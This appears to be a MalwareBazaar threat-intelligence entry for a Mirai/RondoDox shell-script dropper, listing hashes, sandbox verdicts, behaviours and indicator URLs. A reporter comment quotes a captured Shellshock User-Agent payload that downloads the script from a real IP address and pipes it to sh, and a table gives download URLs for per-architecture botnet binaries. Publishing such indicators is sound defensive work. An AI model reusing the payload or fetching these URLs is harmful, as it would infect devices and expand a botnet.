MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 4d6062140b854344d53bcdbbc1137d21e65d043adf92972fefddd2cc765d56e5. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Mirai


Vendor detections: 4


Intelligence 4 IOCs YARA File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: 4d6062140b854344d53bcdbbc1137d21e65d043adf92972fefddd2cc765d56e5
SHA3-384 hash: aa231e07f48ecb6de61478b2278a1bfede0db4421593a4c570e3e5e1e22268095905290fc2889b938f8324d2c6fe8aae
SHA1 hash: 4a774bff25f306b06b338285db42aa4bce36d0c9
MD5 hash: 840ea31b7ad62556ff48f95048f671ed
humanhash: spring-black-kentucky-purple
File name:rondo.qre.sh
Download: download sample
Signature Mirai
Create hunting rule
File size:9'212 bytes
First seen:2025-12-17 15:57:53 UTC
Last seen:Never
File type: sh
MIME type:text/x-shellscript
ssdeep 96:hiRoLngDpQ75uQ7QWQ7AQ75Q7eQ7DQ7oQ7TpQ71Q7CQ7jQ7RQ7NQ7hQ73kQ79fQO:hgoLngKd7edK/wl+2jA6OahhoI3
TLSH T1E312B2C831C402FA6894C4A611F7827CCD0489E4E1A7DDB2E86C6DB69F7C6B8706D79D
TrID 70.0% (.SH) Linux/UNIX shell script (7000/1)
30.0% (.) Unix-like shebang (var.3) (gen) (3000/1)
Magika shell
Reporter ngvcanh2014
Tags:arm dropper elf mips mirai rondo sh x86


Avatar
ngvcanh
User-Agent contain

() { :; }; /bin/bash -c \x22(wget -qO- http://41.231.37.153/rondo.qre.sh||busybox wget -qO- http://41.231.37.153/rondo.qre.sh||curl -s http://41.231.37.153/rondo.qre.sh)|sh\x22& # rondo2012@atomicmail.io
URLMalware sample (SHA256 hash)SignatureTags
http://41.231.37.153/rondo.loln/an/aua-wget
http://41.231.37.153/rondo.mipsdb8da3668c4adefa39fb54a0d8fb86ff5074cca6449da7006ff35f2a4394af46 Gafgytgafgyt ua-wget
http://41.231.37.153/rondo.mipselb2333dcddfce6d4f6b05ad7c7daee5f7b7a43dcd16a7b1d8e3a0baa5837c6649 Gafgytgafgyt ua-wget
http://41.231.37.153/rondo.x86_64092a91a8ec8d2c719cb214d41f5b4429fa31dbcd29fc698f05d22c97c0f40b0c Gafgytgafgyt RondoDox ua-wget
http://41.231.37.153/rondo.armv6l76817011188dc0939fc026be83fdbf48be41ea362a8c9146195761cd71ab57d4 RondoDoxmirai RondoDox ua-wget
http://41.231.37.153/rondo.armv5l60b6bdfb2e378d6749ad4f69dcd61b2255dee10067cdb863fc4eb0bb9a07e34b RondoDoxmirai RondoDox ua-wget
http://41.231.37.153/rondo.armv4lad8a3e8525fa2706e9b9e0650cf2394004d7c56ac28cfda59fc4b2b64126e743 RondoDoxmirai RondoDox ua-wget
http://41.231.37.153/rondo.armv7l2753e8c9a3ad4d47bc0c1751c9f952383322ab8d741c826412cdf367d90c95ef RondoDoxmirai RondoDox ua-wget
http://41.231.37.153/rondo.powerpca3b5397d5249497bd52e5a46635f135cd668e56ade104be100e6add9291fcb61 Miraimirai ua-wget
http://41.231.37.153/rondo.powerpc-440fpn/an/amirai RondoDox ua-wget
http://41.231.37.153/rondo.i6866d2acf6dadd434eba2646ab214b943fc57c5ee6ee6294c71e3e1cecb71b532f0 Miraimirai ua-wget
http://41.231.37.153/rondo.i5865b617e08cec5c2db0db9d60ff0ccbdf820cc2abfd666605ee5fc81ea19c3cc5f Miraimirai ua-wget
http://41.231.37.153/rondo.i48643de8d4bf8be8f3248e81c45a5034b84376d9bb2f78b5580c2dc67a744674ae2 Miraimirai ua-wget
http://41.231.37.153/rondo.arc700a9ba4523c33279d07e3463026b612cc3905fe8db14424f6dcf0de6a4fdcc0240 Miraimirai ua-wget
http://41.231.37.153/rondo.sh4a8530b9f73e1c8a29dec84fb3ef6286bc0087c232b49b7bd866e66c90fbc1b42 Miraimirai ua-wget
http://41.231.37.153/rondo.sparcca49ef1c9c2848ca62eccbd8b987206b8b003922f17afba1da34710938fb9bf2 RondoDoxmirai RondoDox ua-wget
http://41.231.37.153/rondo.m68ka6546ecfc48d24d7d6ce8c6fb163e5c85ba5dff081c8ed6f710959be8a1c8195 Miraimirai ua-wget
http://41.231.37.153/rondo.armebn/an/aRondoDox ua-wget
http://41.231.37.153/rondo.armebhfn/an/aua-wget

Intelligence

File Origin
# of uploads :
1
# of downloads :
54
Origin country :
VN VN
Vendor Threat Intelligence
No detections
Detection(s):
URLhaus.3729149.UNOFFICIAL
Create hunting rule

Verdict:
Malicious
Threat level:
  10/10
Confidence:
100%
Tags:
busybox masquerade
Link:
https://www.filescan.io/uploads/6942d30e3f8fdbf8e9499150/reports/4828896e-48b2-4755-9558-8be6ee5ee344/overview
Verdict:
Clean
File Type:
unix shell
Link:
https://opentip.kaspersky.com/4d6062140b854344d53bcdbbc1137d21e65d043adf92972fefddd2cc765d56e5/results?tab=lookup
Score:
100%
Verdict:
Malware
File Type:
SCRIPT
Link:
https://malprob.io/report/4d6062140b854344d53bcdbbc1137d21e65d043adf92972fefddd2cc765d56e5
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/4d6062140b854344d53bcdbbc1137d21e65d043adf92972fefddd2cc765d56e5/
Verdict:
Clean
Link:
https://tip.neiki.dev/file/4d6062140b854344d53bcdbbc1137d21e65d043adf92972fefddd2cc765d56e5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=jvqgefalqvbujvj3zw54ce35ehtf2bb236jjol7p3xjmy5s5k3sq._file
Result
Malware family:
n/a
Score:
  7/10
Tags:
defense_evasion discovery linux persistence privilege_escalation
Link:
https://tria.ge/reports/251217-tejjaszkfm/
Behaviour
Enumerates kernel/hardware configuration
Reads runtime system information
System Network Configuration Discovery
Writes file to shm directory
Writes file to tmp directory
Reads CPU attributes
Abuse Elevation Control Mechanism: Sudo and Sudo Caching
Deletes log files
Disables AppArmor
Disables SELinux
Enumerates running processes
Write file to user bin folder
Writes file to system bin folder
File and Directory Permissions Modification
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Suspicious File
Score:
0.31
Link:
https://yomi.yoroi.company/submissions/4d6062140b854344d53bcdbbc1137d21e65d043adf92972fefddd2cc765d56e5

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Mirai

sh 4d6062140b854344d53bcdbbc1137d21e65d043adf92972fefddd2cc765d56e5

(this sample)

RondoDox

elf 50ced153269dd746e69c17e7ac2e3656f029ac8c370e28dbc5e872b0f21e452b

  
Dropping
MD5 2a0a15a9294b5d4518b03e1495126cd0
  
Dropping
SHA256 50ced153269dd746e69c17e7ac2e3656f029ac8c370e28dbc5e872b0f21e452b

Comments